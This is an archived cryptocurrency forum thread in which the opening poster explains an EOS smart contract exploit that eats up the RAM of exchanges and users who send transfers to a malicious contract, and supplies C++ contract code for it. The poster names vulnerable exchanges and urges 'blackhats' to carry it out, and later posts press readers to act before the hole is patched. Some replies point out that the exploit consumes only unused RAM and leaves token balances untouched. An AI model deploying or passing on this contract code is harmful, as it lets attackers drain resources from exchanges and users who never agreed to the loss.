[ 3 / biz / cgl / ck / diy / fa / ic / jp / lit / sci / vr / vt ] [ index / top / reports ] [ become a patron ] [ status ]
2023-11: Warosu is now out of extended maintenance.

/biz/ - Business & Finance

View post   
File: 823 KB, 914x1288, Screen Shot 2018-08-19 at 03.16.42.png [View same] [iqdb] [saucenao] [google]
10846298 No.10846298 [Reply] [Original]

DISCLAIMER: This is for educational purposes only. I am not responsible for anything that you choose to do with this information. I strongly recommend that you do not deploy a contract like this.

the eosio.token in EOS has an exploit where you can take user's ram and steal their resources. Exploit was discovered a little while ago but I just checked, and a tonne of exchanges (including binance) and dapps are still vulnerable to it.

im not going to do the exploit myself in case the feds catch me or some shit lol, but ill explain how it works, so if any other devs or blackhats want to have some fun and do it yourself, be my guest ;). Granted, you will probably have to be a little familiar with how eos smart contracts and the eos API works.

okay here is the original link explaining the exploit (right click, and click translate to english): https://mp.weixin.qq.com/s/OE7hxaXyrQ6Ssn-2c55GBA

here is how you can do it:

in a smart contract, there is an event listener function called "apply", it listens to any incoming events on the contract and then executes a handler. inside the handler you can reference other functions in your contract.

here is the apply function:
extern "C" {
/// The apply method implements the dispatch of events to this contract
void apply( uint64_t receiver, uint64_t code, uint64_t action ) {
if(action == N(transfer)) { //Here we make sure that the action is a `transfer` action from any contract that is or follows eosio.token standard
//Here is the handler for the event where we can put our exploit function
exploit_function(reciever);
}
}
}

before we go any further we have to include the currency.hpp file so that we can get a reference to the `transfer` struct and then get person who sent the action (it'll be more clear why we need this in a minute):
#include <eosiolib/currency.hpp> //This uses `currency` as a namespace.

>> No.10846336

>>10846298
okay now we have all of the user's permissions that let us write data on his/her behalf. Now we can have some fun.

lets define a table struct and a multi_index table so that you can store data that the user has given us permissions to do on behalf of them kek.
struct exploit_table {
uint64_t a;
uint64_t b;
uint64_t c;
uint64_t d;
}
typedef eosio::multi_index< N(exploittable), exploit_table > exploittable; //Multi_index table (name of the table cant have any snake_case or camelCase in it)


here is an example of an exploit function:
//We pass in `reciever` from the `apply` function which is a reference to our malicious contract
void exploit_function(self) {
auto data = unpack_action_data<currency::transfer>(); //Unpacking the transfer struct from the currency namespace that we got from icluding currency.hpp
account_name person_we_are_going_to_pwn = data.from;
exploittable get_rekt_scrub(self, self); //Initialise the table scoped to `self, self` (it doesnt matter really as long as the first parameter is `self`)
for(uint i = 0; i < 100; ++i) { //(make sure this for loop isnt too big or the action will through an error). Instead you can just call it multiple times.
get_rekt_scrub.emplace(person_we_are_going_to_pwn,[&](auto& table_ref){
table_ref.a = 100;
table_ref.b = 100;
table_ref.c = 100;
table_ref.d = 100;
});
}
}

Now you can make a Eos withdraw from an exchange or app to this contract. Everytime an exchange sends you their EOS, you will eat up their RAM. Make multiple withdraws and their resources will be drained. “””IF”””” Someone did this, they would basically burn all of the exchanges staked EOS. Which is probably millions of EOS or $10’s or even $100’s of millions worth of EOS that gets destroyed and never returned… Literally the DAO 2.0

>> No.10846377
File: 389 KB, 1854x1574, Screen Shot 2018-08-27 at 02.23.03.png [View same] [iqdb] [saucenao] [google]
10846377

>>10846336
>>10846298
heh code came out shit. Here is a picture of a full contract so you can read it better.

>> No.10846413

wew lad. I literally showed you how you can destroy the eos network and burn all of the exchanges EOS funds and get no replies.

Meanwhile, threads like "tulip mania 2.0" get hundreds. fuck you biz. im out. Enjoy your bags.

Youll also need to define the types and actions in an ABI file but I cba to write one out, but here is the documentation for it: developers.eos.io

>> No.10846430

>>10846413
who are you talking to?

>> No.10846709

>>10846413
Very few people here on biz program, even fewer have experience with coding smart contracts, and almost no one here ever tried the EOS ones. So most don't even know how to start with the info you gave, and the fews who do are would try right away instead of replying.
But I do know the info is legit. Thanks for sharing.

>> No.10846733

Non programmer here. Is this legit? Are we going to witness EOS implode?

>> No.10846759

>>10846733
Yes, it's legit:
https://www.reddit.com/r/eos/comments/9akg1y/eosio_ram_exploit_please_read/

>> No.10846771

>>10846759
So is it fixed or are hackers going to take advantage of the exploit? I don’t have any EOS just curious

>> No.10846786

>>10846298
huh, it's sort of like the DAO reentrancy bug, except worse, because it appears to be unpatchable without fundamentally changing how EOS works.

>> No.10846819

>>10846709
this, people who get it are probably working on it, the rest has no fucking clue what the fuck you just said.

>> No.10846829

>>10846413

Because I'm looking at it. There aren't that many devs on /biz/. I'm considering what to do with this.

>> No.10846839

there's no eos on shapeshift. Buying it anonymously seems hard, and other people are probably way ahead of me in trying to exploit it.
I hope it hurts binance and other exchanges and leads to delisting of eos

>> No.10846863
File: 55 KB, 1000x1000, pepe3.jpg [View same] [iqdb] [saucenao] [google]
10846863

So how to do this as a brainlet?

>> No.10846921

Bump for OP, good work anon

>> No.10846976

>>10846863
if you are a brainlet sorry it won't work for you

>> No.10846982

>>10846377
>>10846413
I just saw this thread, relax

Impressive work anon, really

>> No.10847008

>>10846976
Should I just short eos then?

>> No.10847025
File: 13 KB, 249x386, 5faaf73923c464fc84e135dd147490d508959d3c9f89832876d1138bc563f030.jpg [View same] [iqdb] [saucenao] [google]
10847025

ya im calling bullshit on this
https://www.binance.com/en/trade/EOS_USDT
literally no movement

>> No.10847034

>>10847025
It will take a few hours or so for it to spread within the community. When the ICON exploit was found, it took probably 3 hours or so

>> No.10847046

>>10847034
the icon exploit was a big nothing, it was only irritating

>> No.10847047

>>10847025
because no one has done it yet..

If your going to do it, you should probably do it soon btw. People are talking about it now. Only a matter of time before exchanges get the word and disable withdrawals/implement a proxy contract so it no longer effects them.

>> No.10847053

>>10847025
>bullshit
Nigga, the dev team acknowledged it. It's just that, from what I got, it drains the EOS from the target, but the attacker doesn't get it, so incentive is low.

>> No.10847059
File: 366 KB, 267x200, michael popcorn.gif [View same] [iqdb] [saucenao] [google]
10847059

>>10847047

>> No.10847060

>>10846377
i didnt really explain this either but basically you have to deploy the contract. then make a withdrawal from the exchange to the smart contract and their staked eos and resources get used up/burned.

>> No.10847070

from what I understand even if this works the only thing you could do with this is use up someone's available RAM, you wouldn't actually impact their token balance or anything

>> No.10847085

>>10847053
No the scatter guy acknowledged it and he is a fucking weirdo.

>> No.10847097

>>10847070
Also, this

>> No.10847099

>>10846413
Anon dont be like that. Good thread, well done.

>> No.10847144,1 [INTERNAL] 

The "information" presented here is WRONG.

Yes, there is an exploit right now. But it only affects an account's unused RAM. As soon as they run out of RAM that's it, nothing more this exploit can take from them.

NO, EOS token balances (or other tokens) are not affected. No matter if you have staked or unstaked tokens, the exploit can not touch them.

Yes the exploit is still bad and will have to get fixed immediately (there is a known workaround right now available), it can cost a lot of money if a high value account has a lot of unused RAM and sends a transfers to such a compromised account.

But to put this into perspective most accounts have around 4 or 8 kb of RAM. At least 3 kb are typically used. So if the exploit fills up all your RAM, then you will have to buy around 4 kb of new RAM. That costs around 0.5 EOS right now.

TL;DR: Funds are safu!

>> No.10847144
File: 944 KB, 384x256, purepwnage.gif [View same] [iqdb] [saucenao] [google]
10847144

bump for possible pwnage

>> No.10847353

>>10847046
i mean it killed ICON though, so you can't call it nothing.

>> No.10847360

Holy shit fucking post in here. This board is busy promoting lifestyle posts when we could be witnessing a legitimately critical moment for EOS. I don’t hold any but this seems legit

>> No.10847378

>>10847360
Guarantee nothing comes of this.

>> No.10847388

>>10847378
possible, if you own eos you are already ok with emergency freezes, account lockdowns and editing. If the exploit ends up getting used BPs are only going to edit the changes back.

How did crypto even end up in that state.

>> No.10847396

>>10847070
you can steal someone's ram. I don't know eos enough to know if that ram can be sold then.

>> No.10847466

>>10847396

I don't think it "steals" their RAM it just uses up their available resources like a DDoS or something

>> No.10847526

Well EOS is a shit coin so whatever

>> No.10847537

Bump. Want to see Pajeets get rekt

>> No.10847555

>>10847466
nobody knows if you can sell it or not, because nobody understands eos.

>> No.10847623

Can someone tell me what the fuck is EOS?

>> No.10847644

>>10847623
Have you been living under a rock?

>> No.10847668

>>10847644
This is my first time ever visiting /biz/ and I saw this thread on the front page so yes. I’m just gonna google everything said in this thread that I don’t know about

>> No.10848203

>>10847144
fucking love that this shit is still referenced

>> No.10848825

>>10846298
Whats the point if you can't receive the coins. It's not theft, just vandalism.

>> No.10848825,1 [INTERNAL] 

heh, wat spakkas wrote this shit coin?